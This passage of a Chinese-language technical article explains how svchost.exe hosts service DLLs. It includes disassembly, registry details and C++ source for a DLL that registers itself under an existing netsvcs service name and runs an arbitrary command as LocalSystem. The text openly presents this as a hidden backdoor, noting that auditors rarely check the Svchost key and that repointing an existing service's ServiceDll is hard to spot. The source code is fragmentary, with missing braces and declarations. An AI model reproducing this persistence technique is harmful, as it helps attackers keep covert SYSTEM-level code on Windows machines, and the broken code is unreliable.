.text:0100113D                 jmp     ExitProgram
.text:0100113D start           endp
; =============================== Main Funcion end ===========================================

由于svchost为该组的所有服务都注册了svchost中的一个处理函数,因此每次启动任何一个服务时,服务管理器SCM都会调用FuncServiceMain() 这个函数。这个函数使用 svcTable 查询要启动的服务使用的DLL,调用DLL导出的ServiceMain()函数来启动服务,然后返回。

; ============================== FuncServiceMain() ===========================================
.text:01001504 FuncServiceMain proc near               ; DATA XREF: PrepareSvcTable+44o
.text:01001504 arg_0           = dword ptr  8
.text:01001504 arg_4           = dword ptr  0Ch
.text:01001504                 push    ecx
.text:01001505                 mov     eax, [esp+arg_4]
.text:01001509                 push    ebx
.text:0100150A                 push    ebp
.text:0100150B                 push    esi
.text:0100150C                 mov     ebx, offset unk_1003000
.text:01001511                 push    edi
.text:01001512                 mov     edi, [eax]
.text:01001514                 push    ebx
.text:01001515                 xor     ebp, ebp
.text:01001517                 call    ds:EnterCriticalSection
.text:0100151D                 xor     esi, esi
.text:0100151F                 cmp     dwGroupSize, esi
.text:01001525                 jbe     short loc_1001566
.text:01001527                 and     [esp+10h], esi
.text:0100152B loc_100152B:                            ; CODE XREF: FuncServiceMain+4Aj
.text:0100152B                 mov     eax, svcTable
.text:01001530                 mov     ecx, [esp+10h]
.text:01001534                 push    dword ptr [eax+ecx]
.text:01001537                 push    edi
.text:01001538                 call    ds:lstrcmpiW
.text:0100153E                 test    eax, eax
.text:01001540                 jz      short StartThis
.text:01001542                 add     dword ptr [esp+10h], 0Ch
.text:01001547                 inc     esi
.text:01001548                 cmp     esi, dwGroupSize
.text:0100154E                 jb      short loc_100152B
.text:01001550                 jmp     short loc_1001566
.text:01001552 ; =================================================
.text:01001552 StartThis:                              ; CODE XREF: FuncServiceMain+3Cj
.text:01001552                 mov     ecx, svcTable
.text:01001558                 lea     eax, [esi+esi*2]
.text:0100155B                 lea     eax, [ecx+eax*4]
.text:0100155E                 push    eax
.text:0100155F                 call    GetDLLServiceMain
.text:01001564                 mov     ebp, eax        ; dll ServiceMain Function address
.text:01001566 loc_1001566:                            ; CODE XREF: FuncServiceMain+21j
.text:01001566                                         ; FuncServiceMain+4Cj
.text:01001566                 push    ebx
.text:01001567                 call    ds:LeaveCriticalSection
.text:0100156D                 test    ebp, ebp
.text:0100156F                 jz      short loc_100157B
.text:01001571                 push    [esp+10h+arg_4]
.text:01001575                 push    [esp+14h+arg_0]
.text:01001579                 call    ebp
.text:0100157B loc_100157B:                            ; CODE XREF: FuncServiceMain+6Bj
.text:0100157B                 pop     edi
.text:0100157C                 pop     esi
.text:0100157D                 pop     ebp
.text:0100157E                 pop     ebx
.text:0100157F                 pop     ecx
.text:01001580                 retn    8
.text:01001580 FuncServiceMain endp ; sp = -8
; ============================== FuncServiceMain() end ========================================

由于svchost已经调用了StartServiceCtrlDispatcher来服务调度函数,因此我们在实现DLL实现时就不用了,这主要是因为一个进程只能调用一次StartServiceCtrlDispatcher API。但是需要用 RegisterServiceCtrlHandler 来注册响应控制请求的函数。最后我们的DLL接收的都是unicode字符串。

由于这种服务启动后由svchost加载,不增加新的进程,只是svchost的一个DLL,而且一般进行审计时都不会去HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost 检查服务组是否变化,就算去检查,也不一定能发现异常,因此如果添加一个这样的DLL后门,伪装的好,是比较隐蔽的。

4. 安装服务与设置
要通过svchost调用来启动的服务,就一定要在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost下有该服务名,这可以通过如下方式来实现:
1) 添加一个新的服务组,在组里添加服务名
2) 在现有组里添加服务名
3) 直接使用现有服务组里的一个服务名,但本机没有安装的服务
4) 修改现有服务组里的现有服务,把它的ServiceDll指向自己

其中前两种可以被正常服务使用,如使用第1种方式,启动其服务要创建新的svchost进程;第2种方式如果该组服务已经运行,安装后不能立刻启动服务,因为svchost启动后已经把该组信息保存在内存里,并调用API StartServiceCtrlDispatcher() 为该组所有服务注册了调度处理函数,新增加的服务不能再注册调度处理函数,需要重起计算机或者该组的svchost进程。而后两种可能被后门使用,尤其是最后一种,没有添加服务,只是改了注册表里一项设置,从服务管理控制台又看不出来,如果作为后门还是很隐蔽的。比如EventSystem服务,缺省是指向es.dll,如果把ServiceDll改为EventSystem.dll就很难发现。



注: ImagePath 和ServiceDll 是ExpandString不是普通字符串。因此如果使用.reg文件安装时要注意。

5. DLL服务实现



void CALLBACK FunctionName(
  HWND hwnd,        // handle to owner window
  HINSTANCE hinst,  // instance handle for the DLL
  LPTSTR lpCmdLine, // string the DLL will parse
  int nCmdShow      // show state
对应的命令行是rundll32 DllName,FunctionName [Arguments]



//main service process function
void __stdcall ServiceMain( int argc, wchar_t* argv[] );
//report service stat to the service control manager
int TellSCM( DWORD dwState, DWORD dwExitCode, DWORD dwProgress );
//service control handler, call back by service control manager
void __stdcall ServiceHandler( DWORD dwCommand );
//RealService just create a process
int RealService(char *cmd, int bInteract);

//Install this dll as a Service host by svchost.exe, service name is given by caller
int InstallService(char *name);
//unInstall a Service, be CARE FOR call this to delete a service
int UninstallService(char *name);
//Install this dll as a Service host by svchost.exe, used by RUNDLL32.EXE to call
void CALLBACK RundllInstallA(HWND hwnd, HINSTANCE hinst, char *param, int nCmdShow);
//unInstall a Service used by RUNDLL32.EXE to call, be CARE FOR call this to delete a service
void CALLBACK RundllUninstallA(HWND hwnd, HINSTANCE hinst, char *param, int nCmdShow);

//output the debug infor into log file(or stderr if a console program call me) & DbgPrint
void OutputString( char *lpFmt, … );

6. 代码使用
C:\>tlist -s
   0 System Process
   8 System
240 services.exe    Svcs:  Browser,Dhcp,dmserver,Dnscache,Eventlog,lanmanserver,lanmanworkstation, LmHosts,PlugPlay,ProtectedStorage,TrkWks,Wmi
504 svchost.exe     Svcs:  RpcSs
1360 svchost.exe     Svcs:  EventSystem,Netman,RasMan,SENS,TapiSrv

C:\>rundll32 svchostdll.dll,RundllInstall abcd
you specify service name not in Svchost\netsvcs, must be one of following:
– EventSystem
– Ias
– Iprip
– Irmon
– Netman
– Nwsapagent
– Rasauto
– Rasman
– Remoteaccess
– Sharedaccess
– Tapisrv
– Ntmssvc
– wzcsvc

C:\>rundll32 svchostdll.dll,RundllInstall IPRIP
CreateService(IPRIP) SUCCESS. Config it
Config service IPRIP ok.

C:\>sc start iprip "cmd /k whoami" 1

SvcHostDLL: ServiceMain(3, IPRIP) called
SvcHostDLL: RealService called ‘cmd /k whoami’ Interact
SvcHostDLL: CreateProcess(cmd /k whoami) to 640

C:\>tlist -s
   0 System Process
   8 System
240 services.exe    Svcs:  Browser,Dhcp,dmserver,Dnscache,Eventlog,lanmanserver,lanmanworkstation, LmHosts,PlugPlay,ProtectedStorage,TrkWks,Wmi
504 svchost.exe     Svcs:  RpcSs
640 cmd.exe         Title: C:\WINNT\System32\cmd.exe
1360 svchost.exe     Svcs:  EventSystem,Netman,RasMan,SENS,TapiSrv,IPRIP

C:\>net stop iprip
The IPRIP service was stopped successfully.

C:\>rundll32 svchostdll.dll,RundllUninstall iprip
DeleteService(IPRIP) SUCCESS.

7. 参考

Platform SDK: Tools – Rundll32
1) Inside Win32 Services, Part 2 by: Mark Russinovich, at: http://www.winnetmag.com/Articles/Index.cfm?ArticleID=8943&pg=3
2) Platform SDK: Tools – Rundll32, at: http://msdn.microsoft.com/library/en-us/tools/tools/rundll32.asp


8. 代码
// SvcHostDLL.cpp : Demo for a service dll used by svchost.exe to host it.
// for detail comment see articles.
//   by bingle_at_email.com.cn
//      www.BingleSite.net
/* save following as a .def file to export function, only ServiceMain is needed.
other used to install & uninstall service.
or use /EXPORT: link option to export them.

To compile & link:
cl /MD /GX /LD svchostdll.cpp /link advapi32.lib /DLL /base:0x71000000 /export:ServiceMain /EXPORT:RundllUninstallA /EXPORT:RundllInstallA /EXPORT:InstallService /EXPORT:UninstallService

//  Articles:
// 1. HOWTO Create a service dll used by svchost.exe by bingle, at: http://www.BingleSite.net/article/svchost-dll-service.html
// 2. Inside Win32 Services, Part 2 by: Mark Russinovich, at: http://www.winnetmag.com/Articles/Index.cfm?ArticleID=8943&pg=3
// 3. Platform SDK: Tools – Rundll32, at: http://msdn.microsoft.com/library/en-us/tools/tools/rundll32.asp

#include <stdio.h>
#include <time.h>
#include <assert.h>
#include <windows.h>

#define MY_EXECUTE_NAME "SvcHostDLL.exe"

//main service process function
void __stdcall ServiceMain( int argc, wchar_t* argv[] );
//report service stat to the service control manager
int TellSCM( DWORD dwState, DWORD dwExitCode, DWORD dwProgress );
//service control handler, call back by service control manager
void __stdcall ServiceHandler( DWORD dwCommand );
//RealService just create a process
int RealService(char *cmd, int bInteract);

//Install this dll as a Service host by svchost.exe, service name is given by caller
int InstallService(char *name);
//unInstall a Service, be CARE FOR call this to delete a service
int UninstallService(char *name);
//Install this dll as a Service host by svchost.exe, used by RUNDLL32.EXE to call
void CALLBACK RundllInstallA(HWND hwnd, HINSTANCE hinst, char *param, int nCmdShow);
//unInstall a Service used by RUNDLL32.EXE to call, be CARE FOR call this to delete a service
void CALLBACK RundllUninstallA(HWND hwnd, HINSTANCE hinst, char *param, int nCmdShow);

//output the debug infor into log file(or stderr if a console program call me) & DbgPrint
void OutputString( char *lpFmt, … );

//dll module handle used to get dll path in InstallService
//Service HANDLE & STATUS used to get service state
DWORD dwCurrState;

                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
    switch (ul_reason_for_call)
        hDll = hModule;
#ifdef _DEBUG
        OutputString("SvcHostDLL: DllMain called DLL_PROCESS_ATTACH");

        OutputString("SvcHostDLL: DllMain called DLL_THREAD_ATTACH");
        OutputString("SvcHostDLL: DllMain called DLL_THREAD_DETACH");
        TellSCM( SERVICE_STOP_PENDING, 0, 0 );
        TellSCM( SERVICE_STOPPED, 0, 0 );
        OutputString("SvcHostDLL: DllMain called DLL_PROCESS_DETACH");

    return TRUE;

void __stdcall ServiceMain( int argc, wchar_t* argv[] )
//    DebugBreak();
    char svcname[256];
    strncpy(svcname, (char*)argv[0], sizeof svcname); //it’s should be unicode, but if it’s ansi we do it well
    wcstombs(svcname, argv[0], sizeof svcname);
    OutputString("SvcHostDLL: ServiceMain(%d, %s) called", argc, svcname);

    hSrv = RegisterServiceCtrlHandler( svcname, (LPHANDLER_FUNCTION)ServiceHandler );
    if( hSrv == NULL )
        OutputString("SvcHostDLL: RegisterServiceCtrlHandler %S failed", argv[0]);
    }else FreeConsole();

    TellSCM( SERVICE_RUNNING, 0, 0 );

    // call Real Service function noew
    if(argc > 1)
        strncpy(svcname, (char*)argv[1], sizeof svcname),
        wcstombs(svcname, argv[1], sizeof svcname);
    RealService(argc > 1 ? svcname : MY_EXECUTE_NAME, argc > 2 ? 1 : 0);

        Sleep(10);//not quit until receive stop command, otherwise the service will stop
    }while(dwCurrState != SERVICE_STOP_PENDING && dwCurrState != SERVICE_STOPPED);

    OutputString("SvcHostDLL: ServiceMain done");

int TellSCM( DWORD dwState, DWORD dwExitCode, DWORD dwProgress )
    SERVICE_STATUS srvStatus;
    srvStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS;
    srvStatus.dwCurrentState = dwCurrState = dwState;
    srvStatus.dwWin32ExitCode = dwExitCode;
    srvStatus.dwServiceSpecificExitCode = 0;
    srvStatus.dwCheckPoint = dwProgress;
    srvStatus.dwWaitHint = 3000;
    return SetServiceStatus( hSrv, &srvStatus );

void __stdcall ServiceHandler( DWORD dwCommand )
    // not really necessary because the service stops quickly
    switch( dwCommand )
        TellSCM( SERVICE_STOP_PENDING, 0, 1 );
        OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_STOP");
        TellSCM( SERVICE_STOPPED, 0, 0 );
        TellSCM( SERVICE_PAUSE_PENDING, 0, 1 );
        OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_PAUSE");
        TellSCM( SERVICE_PAUSED, 0, 0 );
        OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_CONTINUE");
        TellSCM( SERVICE_RUNNING, 0, 0 );
        OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_INTERROGATE");
        TellSCM( dwCurrState, 0, 0 );
        OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_SHUTDOWN");
        TellSCM( SERVICE_STOPPED, 0, 0 );

//RealService just create a process
int RealService(char *cmd, int bInteract)
    OutputString("SvcHostDLL: RealService called ‘%s’ %s", cmd, bInteract ? "Interact" : "");
    STARTUPINFO si = {0};
    si.cb = sizeof si;
    if(bInteract) si.lpDesktop = "WinSta0\\Default";
    if(!CreateProcess(NULL, cmd, NULL, NULL, false, 0, NULL, NULL, &si, &pi))
        OutputString("SvcHostDLL: CreateProcess(%s) error:%d", cmd, GetLastError());
    else OutputString("SvcHostDLL: CreateProcess(%s) to %d", cmd, pi.dwProcessId);

    return 0;

int InstallService(char *name)
    // Open a handle to the SC Manager database.
    int rc = 0;
    HKEY hkRoot = HKEY_LOCAL_MACHINE, hkParam = 0;
    SC_HANDLE hscm = NULL, schService = NULL;

    char buff[500];
    char *svcname = DEFAULT_SERVICE;
    if(name && name[0]) svcname = name;

    //query svchost setting
    char *ptr, *pSvchost = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost";
    rc = RegOpenKeyEx(hkRoot, pSvchost, 0, KEY_QUERY_VALUE, &hkRoot);
    if(ERROR_SUCCESS != rc)
        OutputString("RegOpenKeyEx(%s) KEY_QUERY_VALUE error %d.", pSvchost, rc);
        throw "";

    DWORD type, size = sizeof buff;
    rc = RegQueryValueEx(hkRoot, "netsvcs", 0, &type, (unsigned char*)buff, &size);
    if(ERROR_SUCCESS != rc)
        throw "RegQueryValueEx(Svchost\\netsvcs)";

    for(ptr = buff; *ptr; ptr = strchr(ptr, 0)+1)
        if(stricmp(ptr, svcname) == 0) break;

    if(*ptr == 0)
        OutputString("you specify service name not in Svchost\\netsvcs, must be one of following:");
        for(ptr = buff; *ptr; ptr = strchr(ptr, 0)+1)
            OutputString(" – %s", ptr);
        throw "";

    //install service
    hscm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (hscm == NULL)
        throw "OpenSCManager()";
    char *bin = "%SystemRoot%\\System32\\svchost.exe -k netsvcs";

    schService = CreateService(
        hscm,                        // SCManager database
        svcname,                    // name of service
        NULL,           // service name to display
        SERVICE_ALL_ACCESS,        // desired access
        SERVICE_WIN32_SHARE_PROCESS, // service type
        SERVICE_AUTO_START,      // start type
        SERVICE_ERROR_NORMAL,      // error control type
        bin,        // service’s binary
        NULL,                      // no load ordering group
        NULL,                      // no tag identifier
        NULL,                      // no dependencies
        NULL,                      // LocalSystem account
        NULL);                     // no password

    if (schService == NULL)
        OutputString("CreateService(%s) error %d", svcname, rc = GetLastError());
        throw "";
    OutputString("CreateService(%s) SUCCESS. Config it", svcname);


    //config service
    strncpy(buff, "SYSTEM\\CurrentControlSet\\Services\\", sizeof buff);
    strncat(buff, svcname, 100);
    rc = RegOpenKeyEx(hkRoot, buff, 0, KEY_ALL_ACCESS, &hkRoot);
    if(ERROR_SUCCESS != rc)
        OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", svcname, rc);
        throw "";

    rc = RegCreateKey(hkRoot, "Parameters", &hkParam);
    if(ERROR_SUCCESS != rc)
        throw "RegCreateKey(Parameters)";

    if(!GetModuleFileName(HMODULE(hDll), buff, sizeof buff))
        throw "GetModuleFileName() get dll path";

    rc = RegSetValueEx(hkParam, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned char*)buff, strlen(buff)+1);
    if(ERROR_SUCCESS != rc)
        throw "RegSetValueEx(ServiceDll)";

    OutputString("Config service %s ok.", svcname);
    }catch(char *str)
        if(str && str[0])
            rc = GetLastError();
            OutputString("%s error %d", str, rc);


    return rc;

used to install by rundll32.exe
Platform SDK: Tools – Rundll32
The Run DLL utility (Rundll32.exe) included in Windows enables you to call functions exported from a 32-bit DLL. These functions must have the following syntax:
void CALLBACK RundllInstallA(
  HWND hwnd,        // handle to owner window
  HINSTANCE hinst,  // instance handle for the DLL
  char *param,        // string the DLL will parse
  int nCmdShow      // show state

int UninstallService(char *name)
    int rc = 0;
    SC_HANDLE schService;
    SC_HANDLE hscm;

    hscm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (hscm == NULL)
        OutputString("OpenSCManager() error %d", rc = GetLastError() );
        return rc;

    char *svcname = DEFAULT_SERVICE;
    if(name && name[0]) svcname = name;

    schService = OpenService(hscm, svcname, DELETE);
    if (schService == NULL)
        OutputString("OpenService(%s) error %d", svcname, rc = GetLastError() );
        return rc;

    if (!DeleteService(schService) )
        OutputString("OpenService(%s) error %d", svcname, rc = GetLastError() );
        return rc;

    OutputString("DeleteService(%s) SUCCESS.", svcname);
        OutputString("Exception Catched 0x%X", GetExceptionCode());

    return rc;

used to uninstall by rundll32.exe
Platform SDK: Tools – Rundll32
The Run DLL utility (Rundll32.exe) included in Windows enables you to call functions exported from a 32-bit DLL. These functions must have the following syntax:
void CALLBACK RundllUninstallA(
  HWND hwnd,        // handle to owner window
  HINSTANCE hinst,  // instance handle for the DLL
  char *param,        // string the DLL will parse
  int nCmdShow      // show state

//output the debug infor into log file & DbgPrint
void OutputString( char *lpFmt, … )
    char buff[1024];
    va_list    arglist;
    va_start( arglist, lpFmt );
    _vsnprintf( buff, sizeof buff, lpFmt, arglist );
    va_end( arglist );

    DWORD len;
    HANDLE herr = GetStdHandle(STD_OUTPUT_HANDLE);
    if(herr != INVALID_HANDLE_VALUE)
        WriteFile(herr, buff, strlen(buff), &len, NULL);
        WriteFile(herr, "\r\n", 2, &len, NULL);
        FILE *fp = fopen("SvcHost.DLL.log", "a");
            char date[20], time[20];
            fprintf(fp, "%s %s – %s\n", _strdate(date), _strtime(time), buff);
            if(!stderr) fclose(fp);
